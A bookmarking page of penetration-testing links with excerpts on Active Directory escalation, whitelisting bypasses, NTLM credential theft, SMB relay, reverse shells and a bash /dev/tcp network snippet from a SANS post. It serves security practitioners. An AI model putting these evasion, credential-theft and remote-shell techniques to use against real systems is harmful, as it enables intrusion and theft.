recentpopularlog in

whip_lash : pentest   322

« earlier  
SensePost | A new look at null sessions and user enumeration
TLDR; I think I found three new ways to do user enumeration on Windows domain controllers, and I wrote some scripts for it.
activedirectory  pentest  enumeration 
9 hours ago by whip_lash
Reverse MSSQL shell
Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
github  pentest  exfiltration  sql  reverseshell 
13 hours ago by whip_lash
TestingScripts/snmpv3enum.rb at master · raesene/TestingScripts
# This class just wraps snmpwalk and iterates over a series of IP addresses and usernames
# Designed to brute-force a snmpv3 username
# for it to work on ubuntu you need to have the snmp programs and MIBs installed
snmp  snmpv3  bruteforce  pentest  enumeration 
yesterday by whip_lash
Extracting SSH Private Keys from Windows 10 ssh-agent
Favorite tweet:

New blogpost: extracting unencrypted private SSH keys from Windows 10's new builtin ssh-agent service

Had some fun this weekend playing with the new OpenSSH utilities on Windows 10. Might be useful for pentesters/redteamers :)

— Ronnie Flathers (@ropnop) May 20, 2018
security  ssh  pentest 
3 days ago by whip_lash
GitHub - bettercap/bettercap: The Swiss Army knife for 802.11, BLE and Ethernet networks reconnaissance and attacks.
bettercap is the Swiss Army knife for 802.11, BLE and Ethernet networks reconnaissance and attacks.
github  network  pentest  tool 
6 days ago by whip_lash
InfoSec Handlers Diary Blog - Internet Storm Center Diary 2018-05-07
A Job file[1] is a special XML file that contains all the details to configure a scheduled task on a Microsoft Windows host. More technical details about this file format can be found here[2].
persistence  postexploitation  windows  pentest 
17 days ago by whip_lash
Lab of a Penetration Tester: Silently turn off Active Directory Auditing using DCShadow
One very interesting thing which I recently discovered is the ability to DCShadow to modify System Access Control List or SACL. When we enable auditing on success or failure on an AD object, an entry (called ACE - Access Control Entry) is added to the SACL of that object. The permissions to an object are controlled by a DACL. For example, we modified DACL of AdminSDHolder in the previous post for persistence.
activedirectory  pentest  security  dcshadow 
20 days ago by whip_lash
Escalating privileges with ACLs in Active Directory | Fox-IT International blog
This blogpost describes a scenario where our standard attack methods did not
work and where we had to dig deeper in order to gain high privileges in the domain.
We describe more advanced privilege escalation attacks using Access Control Lists
and introduce a new tool called Invoke-Aclpwn and an extension to ntlmrelayx
that automate the steps for this advanced attack.
activedirectory  windows  pentest  privilegeescalation  security 
25 days ago by whip_lash
Malicious Network Traffic From /bin/bash - SANS Internet Storm Center
exec 5<> /dev/tcp/
printf "GET / HTTP/1.0\nHost:\n" >&5
cat <&5
exec 5>&-
bash  c2  networking  hacking  pentest  security  linux  postexploitation 
27 days ago by whip_lash
PDF Files Can Be Abused to Steal Windows Credentials
Baharav published research this week showing how a malicious actor could take advantage of features natively found in the PDF standard to steal NTLM hashes, the format in which Windows stores user credentials.
windows  pentest  hashes  ntlm  responder 
27 days ago by whip_lash
Pwned by a Shortcut – Tom Melo – Medium
I wrote a small CLI tool called lnk2pwn to make the process of generating malicious shortcuts easier and I’m going to be using this tool to prepare the attack
windows  pentest  malware 
27 days ago by whip_lash
w00tsec: Abusing MySQL LOCAL INFILE to read client files
Recently, I was playing the VolgaCTF 2018 CTF with my teammates from TheGoonies and we came across an interesting Web challenge that we didn't manage to solve during the competition. The following day, I read the write-up and learned a cool technique to attack the MySQL client directly via the LOAD DATA INFILE statement.
mysql  pentest 
28 days ago by whip_lash
How to prevent bypassing AppLocker using Alternate Data Streams – Gunnar Haslinger
So, what’s the trick to bypass AppLocker: We copy the contents of an executable to an Alternate Data Stream of the logs-directory. To be clear: Not to a file in the logs-directory, but to an ADS of the logs-directory itself! The copy-job is done using the “type” command redirecting the output to an ADS. The execution of an ADS can be done by various ways, one way would be to use wmic to create a new process, but there are other ways too.
pentest  security  windows  postexploitation  whitelist-evasion 
5 weeks ago by whip_lash
bohops on Twitter: "Is Explorer.exe the ultimate #lolbin? explorer.exe [exe/hta/scr/...etc] *Invokes child processes when called (after a lookup of the the default program handler) *Hides from the default filter in AutoRuns *Just might be doing a little m
Favorite tweet:

Is Explorer.exe the ultimate #lolbin?

explorer.exe [exe/hta/scr/...etc]

*Invokes child processes when called (after a lookup of the the default program handler)
*Hides from the default filter in AutoRuns
*Just might be doing a little more on a workstation in your network#DFIR

— bohops (@bohops) April 19, 2018
Twitter  pentest  security  windows  postexploitation  whitelist-evasion 
5 weeks ago by whip_lash
GitHub - api0cradle/LOLBAS: Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Favorite tweet:

A good documentation on all the different #LOLBins and #LOLScripts would be nice? Right?

Good thing I have started then. Still have a lot of notes to add, but I feel this is a good start. Would love community feedback and contributions.

Is this useful?

— Oddvar Moe [MVP] (@Oddvarmoe) April 19, 2018
Twitter  pentest  security  livingofftheland  whitelist-evasion  postexploitation  windows 
5 weeks ago by whip_lash
subTee: WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets
SO here we have it, another tool, like regsvr32.exe that can accept a script path, or url and execute it.

Much like regsvr32, wmic is proxy aware, and works over TLS.
windows  postexploitation  pentest  whitelist-evasion 
5 weeks ago by whip_lash
dafthack/PowerMeta: PowerMeta searches for publicly available files hosted on various websites for a particular domain by using specially crafted Google, and Bing searches. It then allows for the download of those files from the target domain. After retri
PowerMeta searches for publicly available files hosted on various websites for a particular domain by using specially crafted Google, and Bing searches. It then allows for the download of those files from the target domain. After retrieving the files, the metadata associated with them can be analyzed by PowerMeta.
recon  pentest 
6 weeks ago by whip_lash
Dumping Clear-Text Credentials | Penetration Testing Lab
The article contains Windows locations where passwords might exist and techniques to retrieve them.
passwords  windows  security  pentest  postexploitation 
7 weeks ago by whip_lash
PowerShell/Invoke-ReflectivePEInjection.ps1 at master · clymb3r/PowerShell
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.
powershell  pentest 
7 weeks ago by whip_lash
mwrlabs/bsides18_breakfree: Example tools and output from BSides 2018 "I Want to Break Free"
This is an example word document containing a macro which, when executed, will drop an XML file to disk and run it using msbuild.exe. This is to demonstrate a method of bypassing default AppLocker rules without calling PowerShell.
pentest  malware 
7 weeks ago by whip_lash
OS Command Injection; The Pain, The Gain - Black Hills Information Security
I was confused. I definitely had command injection but nothing was working. I finally figured out that the command length was limited to 32 characters, likely because it was being written to a database first. I discovered this by sending the ping command over and over again with varying numbers of spaces until it stopped working.
security  commandinjection  pentest 
8 weeks ago by whip_lash
GitHub - eladshamir/Internal-Monologue: Internal Monologue Attack: Retrieving NTLM Hashes without Mimikatz
The Internal Monologue Attack flow is described below:

Disable NetNTLMv1 preventive controls by changing LMCompatibilityLevel, NTLMMinClientSec and RestrictSendingNTLMTraffic to appropriate values, as described above.
Retrieve all non-network logon tokens from currently running processes and impersonate the associated users.
For each impersonated user, interact with NTLM SSP locally to elicit a NetNTLMv1 response to the chosen challenge in the security context of the impersonated user.
Restore the original values of LMCompatibilityLevel, NTLMMinClientSec and RestrictSendingNTLMTraffic.
Crack the NTLM hash of the captured responses using rainbow tables.
Pass the Hash.
hash  postexploitation  pentest  security  github 
9 weeks ago by whip_lash
Top Five Ways I gained access to Your Corporate Wireless Network (Lo0tBo0ty KARMA edition)
I’ve been able to snag credentials for EAP and TTLS networks ,where other Evil Twins fail. A set of valid user credentials can allow privilege escalation and persistence that can take a red team sometimes week to establish.
wireless  pentest  security 
9 weeks ago by whip_lash
Creating Static Binaries for Nmap, Socat and other Tools –
In various scenarios it might be helpful or even required to have a statically compiled version of Nmap available. This applies to e.g. scenarios where only limited user privileges are available and installing anything to the system might not be desirable.

For such cases I’ve started to create recipes to build such binaries.
nmap  pentest  security 
12 weeks ago by whip_lash
WSH Injection: A Case Study – Posts By SpecterOps Team Members
Some environments use whitelisting to prevent unsigned Windows Scripting Host (WSH) files from running, especially with the rise of malicious .js or .vbs files. However, by “injecting” our malicious code into a Microsoft signed WSH script, we can bypass such a restriction.
whitelist  pentest 
february 2018 by whip_lash
How to Bypass Application Whitelisting & AV - Black Hills Information Security
Here, we will show you one method of bypassing some application whitelisting products.
february 2018 by whip_lash
Gambler - Hacking and other stuffs
Recently I posted how to get ssh password using strace, but it’s no 100% effective, because the strace output changes on different distros, so searching for another approach I found this site ChokePoint where they show how to create a PAM module using python to log failed attempts on ssh, now all I have to do, was change where they log the password.
ssh  pentest 
february 2018 by whip_lash
cloudtracer/paskto: Paskto - Passive Web Scanner
Paskto will passively scan the web using the Common Crawl internet index either by downloading the indexes on request or parsing data from your local system. URLs are then processed through Nikto and known URL lists to identify interesting content.
webapp  pentest 
february 2018 by whip_lash
Replicator helps developers to reproduce issues discovered by pen testers. The pen tester produces a Replicator file which contains the findings in the report. Each finding includes a request, associated session rules or macros, and logic to detect presence of the vulnerability. The tester sends the Replicator file to the client alongside the report. Developers can then open the file within Burp and replicate the issues. When vulnerabilities have been fixed, Replicator provides confirmation that the attack vector used in the pen test is now blocked. A retest is still recommended, in case alternative attack vectors remain exploitable.
burp  webapp  pentest  report 
february 2018 by whip_lash
If you haven't already killed Lotus Notes, IBM just gave you the perfect reason to do it now, fast • The Register
All that's needed to reproduce the bug, Borup wrote, is to compile his proof-of-concept code and give it a static link as MSIMG32.dll; copy that file to C:\windows\temp; and run sc control lnsusvc 136 at the command line.
ibm  lotusnotes  security  pentest 
february 2018 by whip_lash
VENOM 1.0.15 - Metasploit Shellcode Generator/Compiler/Listener - KitPloit - PenTest Tools for your Security Arsenal ☣
The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ) injects the shellcode generated into one template (example: python) "the python funtion will execute the shellcode into ram" and uses compilers like gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recive the remote connection (shell or meterpreter session).
malware  pentest 
february 2018 by whip_lash
Feature, not bug: DNSAdmin to DC compromise in one line
We will shallowly delve into the protocol’s implementation and detail a cute feature (certainly not a bug!) which allows us, under some circumstances, to run code as SYSTEM on domain controllers, without being a domain admin.
dns  domain  activedirectory  exploit  privesc  pentest  security 
february 2018 by whip_lash
SSH Hijacking for lateral movement | xorl %eax, %eax
By setting MaxSessions to 1 you can disable ControlMaster/session multiplexing and each new session will require a complete new connection that includes the authentication step. However, if you don’t, then regardless of how strong authentication method you are employing for your users, an attacker only has to get code execution to one of your user’s endpoints and wait for that user to SSH somewhere. The attacker can look for the open connections by inspecting the directory specified by ControlPath directive on the client’s side or just using common tools like netstat. Then, if the attacker attempts to open an SSH session to a host that it is already in the ControlMaster, it will require no authentication or establishing a new connection as it is re-using the existing one.
pentest  ssh  security 
february 2018 by whip_lash
Public Release of Hate_Crack - Automated Hash Cracking Techniques with HashCat - TrustedSec
Martin Bos covered several of these attacks in a previous post, describing his methodology for cracking the LinkedIn hash dump of 2012. If you don’t know Martin (formerly known as pure_hate), he is a long-standing member of Team Hashcat, has competed in several hash cracking contests, and has an unhealthy obsession with cracking hashes. The sharing of his methodology inspired the creation of this script, so that our team could up their hash cracking game.
hash  hashcat  hashes  pentest 
february 2018 by whip_lash
Enumdb - MySQL and MSSQL Brute Force And Post Exploitation Tool To Search Through Databases And Extract Sensitive Information - KitPloit - PenTest Tools for your Security Arsenal ☣
Enumdb is brute force and post exploitation tool for MySQL and MSSQL databases. When provided a list of usernames and/or passwords, it will cycle through each looking for valid credentials.
database  sql  MySQL  bruteforce  pentest 
january 2018 by whip_lash
CNIT 127: Exploit Development -- Sam Bowne
Learn how to find vulnerabilities and exploit them to gain control of target systems, including Linux, Windows, Mac, and Cisco. This class covers how to write tools, not just how to use them; essential skills for advanced penetration testers and software security professionals.
Advisory: CS 110A or equivalent familiarity with programming
pentest  exploit  development  programming  security  learning  class 
january 2018 by whip_lash
smb2-vuln-uptime NSE Script
Attempts to detect missing patches in Windows systems by checking the uptime returned during the SMB2 protocol negotiation.

SMB2 protocol negotiation response returns the system boot time pre-authentication. This information can be used to determine if a system is missing critical patches without triggering IDS/IPS/AVs.

Remember that a rebooted system may still be vulnerable. This check only reveals unpatched systems based on the uptime, no additional probes are sent.
smb  pentest  nmap  nse  vulnerability  scanner 
january 2018 by whip_lash
http-form-brute NSE Script
Performs brute force password auditing against http form-based authentication.
namp  nse  pentest  webapp  bruteforce 
january 2018 by whip_lash
GitHub - dzonerzy/winescalation: Python based module to find common vulnerabilities which lead to Windows privilege escalation
This is a Python based module for fast checking of common vulnerabilities affecting windows which lead to privilege escalation
python  windows  privilegeescalation  privesc  pentest  security 
january 2018 by whip_lash
evilsocket/bettercap: A complete, modular, portable and easily extensible MITM framework.
bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.
github  security  pentest  mitm 
january 2018 by whip_lash
mitm6 – compromising IPv4 networks via IPv6 | Fox-IT International blog
Running the attack itself is quite straightforward. First we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network. For the second part of our attack, we use our favorite relaying tool, ntlmrelayx. This tool is part of the impacket Python library by Core Security and is an improvement on the well-known smbrelayx tool, supporting several protocols to relay to. Core Security and Fox-IT recently worked together on improving ntlmrelayx, adding several new features which (among others) enable it to relay via IPv6, serve the WPAD file, automatically detect proxy requests and prompt the victim for the correct authentication. If you want to check out some of the new features, have a look at the relay-experimental branch.

To serve the WPAD file, all we need to add to the command prompt is the host is the -wh parameter and with it specify the host that the WPAD file resides on. Since mitm6 gives us control over the DNS, any non-existing hostname in the victim network will do. To make sure ntlmrelayx listens on both IPv4 and IPv6, use the -6 parameter. The screenshots below show both tools in action, mitm6 selectively spoofing DNS replies and ntlmrelayx serving the WPAD file and then relaying authentication to other servers in the network.

hash  relay  ipv6  mitm  pentest  security 
january 2018 by whip_lash
10 common mistakes aspiring/new pentesters make – PentesterLab
Reversing and writing exploits are amazing things to do and you should definitely look into these two domains. However, if you want to break into infosec and score your first job, you need to be good at web (and mobile and network to a lesser extend) security. Most pentesting companies have a lot of their workload composed of web testing and this is not going to change in the next few months. Furthermore, they also have seniors people who are dying to do more research and will probably have priority on all the reversing/exploit writing jobs. So if you want to increase your likelihood of getting hired, you need to become a gun at web pentesting.

pentest  jobs  career 
january 2018 by whip_lash
Operation Cobalt Kitty: A large-scale APT in Asia carried out by the OceanLotus Group
The attackers arsenal consisted of modified publicly-available tools as well as six undocumented custom-built tools, which Cybereason considers the threat actor’s signature tools. Among these tools are two backdoors that exploited DLL sideloading attack in Microsoft, Google and Kaspersky applications. In addition, they developed a novel and stealthy backdoor that targets Microsoft Outlook for command-and-control channel and data exfiltration.

apt  security  pentest 
january 2018 by whip_lash
Who can add workstation to the domain – Dubai Security Blog
So taking into consideration above 2 items, by default any authenticated user can join up to 10 machines to the domain.
activedirectory  security  pentest 
january 2018 by whip_lash
Web Application Firewall (WAF) Evasion Techniques – secjuice™ – Medium
Why using ? instead of *? Because the asterisk (*) is widely used for comment syntax (something like /* hey I’m a comment */) and many WAF blocks it in order to avoid SQL Injection… something like UNION+SELECT+1,2,3/*
waf  hacking  pentest  security 
january 2018 by whip_lash
Top 32 Nmap Command Examples For Sys/Network Admins - nixCraft
The -D option it appear to the remote host that the host(s) you specify as decoys are scanning the target network too. Thus their IDS might report 5-10 port scans from unique IP addresses, but they won’t know which IP was scanning them and which were innocent decoys:
nmap  pentest 
january 2018 by whip_lash
Abusing Microsoft Word Features for Phishing: “subDoc” - Rhino Security Labs
In the above configuration, we’re telling Word to open a sub-document over the network using a UNC path which points external to their network. The destination IP address, in this case, is a VM instance that we control, hosted by a cloud provider which allows incoming SMB requests.

At this point, we’re able to load which allows us to listen for incoming SMB requests and collect the respective NTLMv2 hashes.
hashes  Microsoft  office  vulnerability  pentest  responder  security 
january 2018 by whip_lash
Cracking Encrypted PDFs – Part 1 | Didier Stevens
In this series of blog posts, I’ll explain how I decrypted the encrypted PDFs shared by John August (John wanted to know how easy it is to crack encrypted PDFs, and started a challenge).

Here is how I decrypted the “easy” PDF (encryption_test).
pdf  hacking  pentest  security 
january 2018 by whip_lash
Relayer - SMB Relay Attack Script - KitPloit - PenTest Tools for your Security Arsenal ☣
Relayer is an SMB relay Attack Script that automates all the necessary steps to scan for systems with SMB signing disabled and relaying authentication request to these systems with the objective of gaining a shell. Great when performing Penetration testing.
smb  pentest  windows 
december 2017 by whip_lash
« earlier      
per page:    204080120160

Copy this bookmark:

to read